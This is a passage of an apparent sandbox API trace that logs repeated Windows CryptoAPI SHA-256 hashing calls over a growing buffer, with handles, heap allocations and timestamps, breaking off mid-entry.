[0186.765] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0186.765] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0186.766] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.766] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x560, dwFlags=0x0) returned 1 [0186.766] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86640 [0186.766] CryptDestroyHash (hHash=0x3396f890) returned 1 [0186.766] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0186.766] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338232d0) returned 1 [0186.766] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.766] CryptHashData (hHash=0x3396f510, pbData=0x32348160, dwDataLen=0x580, dwFlags=0x0) returned 1 [0186.766] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86a30 [0186.766] CryptDestroyHash (hHash=0x3396f510) returned 1 [0186.766] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0186.766] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338222d0) returned 1 [0186.767] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.767] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0186.767] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86a90 [0186.767] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0186.767] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0186.767] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338232d0) returned 1 [0186.768] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.768] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0186.768] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86610 [0186.768] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0186.768] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0186.768] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338237d0) returned 1 [0186.769] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.769] CryptHashData (hHash=0x3396f7b0, pbData=0x32348160, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0186.769] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85f80 [0186.769] CryptDestroyHash (hHash=0x3396f7b0) returned 1 [0186.769] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0186.769] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0186.769] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.769] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0x600, dwFlags=0x0) returned 1 [0186.769] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85ec0 [0186.769] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0186.769] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0186.769] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338220d0) returned 1 [0186.770] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.770] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x620, dwFlags=0x0) returned 1 [0186.770] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85fb0 [0186.770] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.770] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0186.770] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338223d0) returned 1 [0186.771] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.771] CryptHashData (hHash=0x3396f190, pbData=0x32348160, dwDataLen=0x640, dwFlags=0x0) returned 1 [0186.771] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e862b0 [0186.771] CryptDestroyHash (hHash=0x3396f190) returned 1 [0186.771] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0186.771] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0186.771] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.771] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0x660, dwFlags=0x0) returned 1 [0186.771] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e860d0 [0186.771] CryptDestroyHash (hHash=0x3396f900) returned 1 [0186.772] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0186.772] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0186.772] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.772] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0x680, dwFlags=0x0) returned 1 [0186.772] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86310 [0186.772] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0186.772] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0186.772] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ed0) returned 1 [0186.773] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.773] CryptHashData (hHash=0x3396f270, pbData=0x32348160, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0186.773] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86070 [0186.773] CryptDestroyHash (hHash=0x3396f270) returned 1 [0186.773] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0186.773] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822dd0) returned 1 [0186.777] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.777] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0186.777] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e866d0 [0186.777] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0186.777] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0186.777] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.777] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.777] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0186.777] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86100 [0186.777] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0186.777] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.777] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0186.781] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.781] CryptHashData (hHash=0x3396ef60, pbData=0x32348160, dwDataLen=0x700, dwFlags=0x0) returned 1 [0186.781] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86340 [0186.781] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0186.781] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0186.781] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338229d0) returned 1 [0186.782] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.782] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0x720, dwFlags=0x0) returned 1 [0186.782] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86370 [0186.782] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0186.782] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0186.782] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338229d0) returned 1 [0186.782] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.782] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0x740, dwFlags=0x0) returned 1 [0186.782] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86430 [0186.782] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0186.782] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0186.782] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.783] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.783] CryptHashData (hHash=0x3396f510, pbData=0x32348160, dwDataLen=0x760, dwFlags=0x0) returned 1 [0186.783] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86f70 [0186.783] CryptDestroyHash (hHash=0x3396f510) returned 1 [0186.783] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.783] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.784] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.784] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x780, dwFlags=0x0) returned 1 [0186.784] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86d00 [0186.784] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.784] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.784] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.784] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.784] CryptHashData (hHash=0x3396f040, pbData=0x32348160, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0186.784] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e874e0 [0186.784] CryptDestroyHash (hHash=0x3396f040) returned 1 [0186.784] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.784] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.785] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.785] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0186.785] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86d90 [0186.785] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0186.785] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.785] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.786] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.786] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0186.786] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86c40 [0186.786] CryptDestroyHash (hHash=0x3396f900) returned 1 [0186.786] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.786] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821fd0) returned 1 [0186.786] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.786] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x800, dwFlags=0x0) returned 1 [0186.786] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86b80 [0186.786] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.786] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0186.786] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0186.787] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.787] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0x820, dwFlags=0x0) returned 1 [0186.787] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87180 [0186.787] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0186.787] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0186.787] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338237d0) returned 1 [0186.788] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.788] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0x840, dwFlags=0x0) returned 1 [0186.788] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87300 [0186.788] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0186.788] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0186.788] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0186.788] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.788] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x860, dwFlags=0x0) returned 1 [0186.788] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87270 [0186.788] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.789] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0186.789] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338237d0) returned 1 [0186.789] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.789] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0x880, dwFlags=0x0) returned 1 [0186.789] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86f10 [0186.789] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0186.789] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0186.789] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0186.790] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.790] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0186.790] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86dc0 [0186.790] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0186.790] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0186.790] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0186.790] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.790] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0186.792] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87540 [0186.792] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0186.792] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0186.792] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338222d0) returned 1 [0186.792] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.792] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0186.792] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86eb0 [0186.792] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0186.792] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0186.792] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338239d0) returned 1 [0186.793] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.793] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x900, dwFlags=0x0) returned 1 [0186.793] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86ee0 [0186.793] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.793] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0186.793] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.796] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.796] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x920, dwFlags=0x0) returned 1 [0186.796] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86bb0 [0186.796] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0186.796] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.796] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338226d0) returned 1 [0186.796] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.796] CryptHashData (hHash=0x3396f740, pbData=0x32348160, dwDataLen=0x940, dwFlags=0x0) returned 1 [0186.796] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e871b0 [0186.796] CryptDestroyHash (hHash=0x3396f740) returned 1 [0186.796] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0186.796] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0186.797] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.797] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x960, dwFlags=0x0) returned 1 [0186.797] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86b50 [0186.797] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0186.797] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0186.797] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.798] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.798] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x980, dwFlags=0x0) returned 1 [0186.798] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86be0 [0186.798] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.798] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.798] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0186.798] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.798] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0186.798] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e871e0 [0186.799] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0186.799] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0186.799] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822bd0) returned 1 [0186.799] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.799] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0186.799] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87450 [0186.799] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.799] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0186.799] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.800] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.800] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0186.800] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86e80 [0186.800] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.800] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.800] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338232d0) returned 1 [0186.801] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.801] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0186.801] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86df0 [0186.801] CryptDestroyHash (hHash=0x3396f900) returned 1 [0186.801] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0186.801] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822dd0) returned 1 [0186.801] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.801] CryptHashData (hHash=0x3396ef60, pbData=0x32348160, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0186.801] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86f40 [0186.801] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0186.801] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0186.801] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823bd0) returned 1 [0186.802] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.802] CryptHashData (hHash=0x3396f270, pbData=0x32348160, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0186.802] RtlAllocateHeap 